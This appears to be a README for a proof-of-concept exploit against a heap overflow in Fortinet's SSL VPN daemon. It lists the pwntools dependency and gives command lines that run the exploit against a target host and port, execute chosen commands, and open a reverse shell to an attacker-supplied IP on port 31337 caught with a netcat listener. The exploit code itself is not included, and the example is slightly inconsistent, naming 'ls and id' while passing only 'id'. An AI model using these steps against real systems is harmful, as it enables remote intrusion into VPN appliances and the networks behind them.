POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon
Dependency:

pip install pwntools

To use this code, save it in a file, say exploit.py, and run it with Python from the command line, passing in the required arguments. Here is the general form of the command:

python exploit.py <target_host> <target_port> <reverse_ip>
Replace <target_host> with the hostname or IP address of the target system, <target_port> with the port number of the vulnerable service, and <reverse_ip> with the IP address of the machine that should receive the reverse shell. Any remaining arguments are the commands you want to execute, separated by spaces.
For example, if the target system has IP address 192.168.0.100, the vulnerable service is running on port 8080, and you want to execute the ls and id commands, you would run the following command:
python exploit.py 192.168.0.100 8080 192.168.0.101 id
This will create a reverse shell connection to 192.168.0.101:31337 and execute the ls and id commands on the target system. Note that a listener must already be running on that IP address and port to receive the reverse shell; ncat or netcat can be used to create one.